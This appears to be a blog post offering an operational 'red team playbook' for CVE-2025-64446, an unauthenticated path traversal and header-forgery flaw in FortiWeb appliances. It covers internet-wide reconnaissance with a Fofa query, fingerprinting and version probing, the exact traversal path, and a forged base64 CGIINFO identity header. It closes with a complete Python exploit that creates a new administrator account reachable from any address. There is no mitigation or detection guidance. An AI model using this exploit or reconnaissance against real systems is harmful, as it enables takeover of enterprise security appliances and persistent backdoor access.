CVE-2025–64446 — A Red Team Offensive Playbook for FortiWeb RCE via Path Traversal + Authentication

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Fortinet products are some of the most battle-tested appliances protecting enterprise networks today — and ironically, the moment a Forti appliance becomes vulnerable, the blast radius is catastrophic. In late 2025, one of the most dangerous vulnerabilities ever discovered in FortiWeb surfaced: CVE-2025–64446, a chaining vulnerability that combines:

Path Traversal
Internal CGI handler exposure
Authentication Bypass via header forging
Privilege escalation to full administrative control

All without authentication. All via a single HTTP request. All remotely exploitable.

This article is not marketing fluff. This is the real offensive playbook — mapped exactly as a red teamer, exploit developer, or bug bounty hunter would execute it.

Press enter or click to view image in full size

1. Recon

Goal: Identify FortiWeb appliances exposed online

Your first step in any offensive operation is mapping what’s alive and internet-facing.

Fofa Query

product:"FortiWeb"

Look for:

FortiWeb login pages
FortiWeb WAF portals
Exposed management ports (80/443/8443)
“Server: FortiWeb” banners
TLS certificates containing “Fortinet”, “FortiWeb”

Why recon matters

CVE-2025–64446 is only exploitable if:

The management interface is exposed
The appliance is pre-patch
The API routing stack is still using the vulnerable paths
The internal CGI handler (fwbcgi) is reachable

Recon gives you everything you need to decide whether to proceed.

2. Fingerprinting

Goal: Confirm the device is FortiWeb (not FortiGate, FortiProxy, etc.)

Banner grabbing

curl -k -I https://TARGET:8443

Typical output:

Server: FortiWeb
Set-Cookie: APSCOOKIE_xxx=...

FortiWeb also frequently exposes:

/api/v2.0/
/favicon.ico with a distinctive hash
Unique HTML comments such as

Fingerprint Indicators

Server: FortiWeb
/api/v2.0/cmdb/... returns 403 (expected pre-auth)
TLS CN often includes “FWB”

Once fingerprinted, move on to versioning.

3. Version Detection

Goal: Determine if the appliance is within the vulnerable version ranges.

Affected Versions (Based on NVD, vendor advisories)

BranchVulnerable Versions7.0.x7.0.0–7.0.117.2.x7.2.0–7.2.117.4.x7.4.0–7.4.97.6.x7.6.0–7.6.48.0.x8.0.0–8.0.1

Version Endpoint Probe

FortiWeb exposes version metadata at:

/api/v2.0/system/status

Anonymous requests usually fail, but vulnerable systems sometimes leak partial version strings in:

Error messages
Redirect headers
HTML comments
SSL certificate metadata

Regardless of method, once you confirm the version fits the vulnerable range, you move to exploitation.

4. Attack Method 1: Path Traversal

Goal: Break out of API routing and reach internal CGI.

This is the heart of CVE-2025–64446.

The vulnerable endpoint is reached by abusing:

/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi

Key observations

%3f is URL-encoded ?
FortiWeb’s routing parser mishandles %3f in combination with path segments
Traversal (../../../../../) escapes the API sandbox
You end up executing an internal CGI script: fwbcgi

fwbcgi is normally reachable only after login, making this deadly.

Result

➡ You fully bypass the FortiWeb API access controls ➡ You reach a privileged internal handler ➡ Now you’re at step 2: breaking authentication

5. Attack Method 2: CGIINFO Manipulation

Goal: Forge an internal authentication identity

Once fwbcgi executes, it expects an internal header:

CGIINFO: <base64 JSON>

Usually generated by the authenticated GUI, it carries identity metadata.

What the JSON looks like

{
    "username": "admin",
    "profname": "prof_admin",
    "vdom": "root",
    "loginname": "admin"
}

This is terrifying because:

The handler trusts the header blindly.
No signature.
No HMAC.
No token validation.

If you send it, you become admin.

Your exploit turns this into:

✔ Full auth bypass ✔ Full privilege escalation ✔ Full remote admin

This is the second half of the CVE chain.

6. Attack Method 3: Admin User Injection (The Exploit)

Goal: Create a new admin user using forged privileges.

This is where your exploit shines.

Below is your final exploit script, modified for host:port and with color, formatting, and full operational clarity.

🔥 Full Exploit PoC (Python)

CVE-2025–64446 Admin Account Injection

import http.client
import ssl
import base64
import json
from uuid import uuid4
import sys

# ======================
#   ANSI COLOR CODES
# ======================
RED     = "\033[91m"
GREEN   = "\033[92m"
YELLOW  = "\033[93m"
BLUE    = "\033[94m"
MAGENTA = "\033[95m"
CYAN    = "\033[96m"
WHITE   = "\033[97m"
BOLD    = "\033[1m"
RESET   = "\033[0m"

banner = f"""
{MAGENTA}{BOLD}
 __     __              _                   _____         _     
 \ \   / /__ _ __ _   _| |    __ _ _____   |_   _|__  ___| |__  
  \ \ / / _ \ '__| | | | |   / _` |_  / | | || |/ _ \/ __| '_ \ 
   \ V /  __/ |  | |_| | |__| (_| |/ /| |_| || |  __/ (__| | | |
    \_/ \___|_|   \__, |_____\__,_/___|\__, ||_|\___|\___|_| |_|
           |___/                |___/                    
                  ____   ___ ____  ____     __   _  _   _  _   _  _    __   
  _____   _____  |___ \ / _ \___ \| ___|   / /_ | || | | || | | || |  / /_  
 / __\ \ / / _ \   __) | | | |__) |___ \  | '_ \| || |_| || |_| || |_| '_ \ 
| (__ \ V /  __/  / __/| |_| / __/ ___) | | (_) |__   _|__   _|__   _| (_) |
 \___| \_/ \___| |_____|\___/_____|____/   \___/   |_|    |_|    |_|  \___/ 


{CYAN}         cve-2025-64446.py
{WHITE}
        (*) {YELLOW}FortiWeb Authentication Bypass Artifact Generator{WHITE}
          - {GREEN}VeryLazyTech{WHITE} (@VeryLazyTech)

        CVEs: {RED}[CVE-2025-64446]{RESET}
"""

print(banner)

# ======================
#     ARG CHECK
# ======================
if len(sys.argv) != 2:
    print(f"{RED}[-] Usage: python3 cve-2025-64446.py <target_fortiweb_ip>{RESET}")
    sys.exit(1)

user = str(uuid4())[:8]
password = user

try:
    host, port = sys.argv[1].split(":")
    port = int(port)
except ValueError:
    print(f"{RED}[-] Invalid format! Use <host:port>{RESET}")
    sys.exit(1)
    
raw_path = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi"

cgiinfo_json = {
    "username": "admin",
    "profname": "prof_admin",
    "vdom": "root",
    "loginname": "admin"
}

cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()

headers = {
    "CGIINFO": cgiinfo_b64,
    "Content-Type": "application/x-www-form-urlencoded",
}

body = {
    "data": {
        "q_type": 1,
        "name": user,
        "access-profile": "prof_admin",
        "access-profile_val": "0",
        "trusthostv4": "0.0.0.0/0",
        "trusthostv6": "::/0",
        "last-name": "",
        "first-name": "",
        "email-address": "",
        "phone-number": "",
        "mobile-number": "",
        "hidden": 0,
        "comments": "",
        "sz_dashboard": -1,
        "type": "local-user",
        "type_val": "0",
        "admin-usergrp_val": "0",
        "wildcard_val": "0",
        "accprofile-override_val": "0",
        "sshkey": "",
        "passwd-set-time": 0,
        "history-password-pos": 0,
        "history-password0": "",
        "history-password1": "",
        "history-password2": "",
        "history-password3": "",
        "history-password4": "",
        "history-password5": "",
        "history-password6": "",
        "history-password7": "",
        "history-password8": "",
        "history-password9": "",
        "force-password-change": "disable",
        "force-password-change_val": "0",
        "password": password
    }
}

body_data = json.dumps(body)
context = ssl._create_unverified_context()
conn = http.client.HTTPSConnection(host, port, context=context)

print(f"{BLUE}[~] Sending exploit payload to {host}:{port} ...{RESET}")

conn.request("POST", raw_path, body=body_data, headers=headers)
resp = conn.getresponse()

# ======================
#     RESULT OUTPUT
# ======================
if resp.status == 200:
    print(f"{GREEN}[✓] Exploit sent successfully!{RESET}")
    print(f"{YELLOW}[*] New user created → {GREEN}{user}{RESET}")
    print(f"{YELLOW}[*] Password         → {GREEN}{password}{RESET}")
else:
    print(f"{RED}[✗] Exploit failed — Status Code: {resp.status}{RESET}")

Learn & practice For the OSCP.

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousPOC - CVE-2025-29306 FOXCMS /images/index.html Code Execution Vulnerability NextGitHub Dorks

Last updated 2 months ago

hashtag1. Recon

hashtagGoal: Identify FortiWeb appliances exposed online

hashtagFofa Query

hashtagWhy recon matters

hashtag2. Fingerprinting

hashtagGoal: Confirm the device is FortiWeb (not FortiGate, FortiProxy, etc.)

hashtagBanner grabbing

hashtagFingerprint Indicators

hashtag3. Version Detection

hashtagGoal: Determine if the appliance is within the vulnerable version ranges.

hashtagAffected Versions (Based on NVD, vendor advisories)

hashtagVersion Endpoint Probe

hashtag4. Attack Method 1: Path Traversal

hashtagGoal: Break out of API routing and reach internal CGI.

hashtagKey observations

hashtagResult

hashtag5. Attack Method 2: CGIINFO Manipulation

hashtagGoal: Forge an internal authentication identity

hashtagWhat the JSON looks like

hashtagYour exploit turns this into:

hashtag6. Attack Method 3: Admin User Injection (The Exploit)

hashtagGoal: Create a new admin user using forged privileges.

hashtag🔥 Full Exploit PoC (Python)

hashtagCVE-2025–64446 Admin Account Injectionarrow-up-right